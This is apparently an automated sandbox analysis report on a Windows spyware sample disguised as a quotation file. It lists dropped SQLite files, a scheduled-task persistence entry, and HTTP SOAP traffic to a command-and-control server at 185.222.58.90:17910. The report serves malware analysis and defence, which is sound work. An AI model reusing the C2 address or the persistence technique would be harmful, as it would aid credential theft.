https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.58.90	unknown	Netherlands		51447	ROOTLAYERNETNL	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	648537
Start date and time: 20/06/202205:27:07	2022-06-20 05:27:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	QUOTATION062022.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/53@4/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 1.6% (good quality ratio 1.5%) Quality average: 67.1% Quality standard deviation: 19.1%
HCA Information:	Successful, ratio: 97% Number of executed functions: 113 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
Excluded domains from analysis (whitelisted): www.bing.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:28:30	Task Scheduler	Run new task: Nafifas path: "C:\Users\user\AppData\Roaming\Data\Data.exe"
05:28:51	API Interceptor	234x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.222.58.90	QUOTATION 061622.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	SecuriteInfo.com.Variant.MSILHeracles.37401.28222.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	RFQ - FYKS - 06052022.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	185.222.58.90:17910/
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	Browse	185.222.58.90:17910/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROOTLAYERNETNL	Sipari#U015f -16 0652022 _June 2022,pfd.exe	Get hash	malicious	Browse	185.222.57.197
	SecuriteInfo.com.W32.AIDetect.malware2.21664.exe	Get hash	malicious	Browse	185.222.57.197
	QUOTATION 061622.exe	Get hash	malicious	Browse	185.222.58.90
	vbc.exe	Get hash	malicious	Browse	185.222.57.197
	SOA.exe	Get hash	malicious	Browse	185.222.57.146
	0123987INMWN2987.js	Get hash	malicious	Browse	45.137.22.152
	L4aghbwCQr54nW4.exe	Get hash	malicious	Browse	45.137.22.152
	Order Enquiry.exe	Get hash	malicious	Browse	185.222.57.173
	Quotation.exe	Get hash	malicious	Browse	45.137.22.40
	CCMWZuN3YWHECys.exe	Get hash	malicious	Browse	45.137.22.152
	SecuriteInfo.com.Trojan005944781.27289.exe	Get hash	malicious	Browse	185.222.57.197
	vqalfhePHx.exe	Get hash	malicious	Browse	45.137.22.237
	PyS0mctVfI.exe	Get hash	malicious	Browse	45.137.22.237
	Yeni sipari#U015f _No.129099, pdf.exe	Get hash	malicious	Browse	185.222.57.197
	ldzOp71fAH.exe	Get hash	malicious	Browse	185.222.57.197
	INV198763.js	Get hash	malicious	Browse	45.137.22.152
	LR7AKSMQhc.exe	Get hash	malicious	Browse	45.137.22.237
	Quotation.exe	Get hash	malicious	Browse	45.137.22.40
	INVZ678765340.js	Get hash	malicious	Browse	45.137.22.72
	Bestellung -20162022 _June 2022,pdf.exe	Get hash	malicious	Browse	185.222.57.197

Process:	C:\Users\user\AppData\Roaming\Data\Data.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.345981753770044
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
MD5:	CB16F02E4CEFD4F305114A67B4865184
SHA1:	7A481FAE100B554EB754816608A7776954863CFF
SHA-256:	0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
SHA-512:	1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION062022.exe.log

Download File

Process:	C:\Users\user\Desktop\QUOTATION062022.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.345981753770044
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21rkvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks29E4KnKDE4KhK3VZ9pKhk
MD5:	CB16F02E4CEFD4F305114A67B4865184
SHA1:	7A481FAE100B554EB754816608A7776954863CFF
SHA-256:	0428AA69397DC9399FEBFB4293F8FD06202C8A3C2E9B3F841EBA2DE87DB9FC25
SHA-512:	1F96226886924B2F33578AB5F2B1306A77925FB86AC05615565C3F4EF7D93DB40F9ADD05CDA7F5435DEF58D1FEA1A33473EDDDAFFB0AF8161E73BC7CDBEAEF47
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2502
Entropy (8bit):	5.3347050065951125
Encrypted:	false
SSDEEP:	48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHDJHjHKoLK:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo6d
MD5:	44A99103902115000FEE31833EEF1EC7
SHA1:	8A5D9F44EEDDB720DA442547F396ED61378DC5CF
SHA-256:	E1CDCE73432C1A13E0C2C29AA9DD3282DC9C6CC07262AEFEFBC0BC0BF13A7039
SHA-512:	89C217C56022C88F94B813A81E83800B9D5D4779364E1E40D3C892100AEBAC9ACA75F9E767B6C003D88399A462830FE6973F7D611595ADFAAEBE8D39723A37F0
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\tmp151F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1759.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp22C0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp39BB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4108.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4EA7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp53EE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5452.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5557.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp605F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.........................................

Source: http://185.222.58.90:17910	Avira URL Cloud: Label: malware
Source: http://185.222.58.90:1	Avira URL Cloud: Label: malware
Source: http://185.222.58.90:17910/	Avira URL Cloud: Label: malware

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1108528Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1108520Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1107783Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1107775Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ok9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:1
Source: vbc.exe, 00000004.00000002.379436483.0000000007421000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:17910
Source: vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:17910/
Source: vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:179104
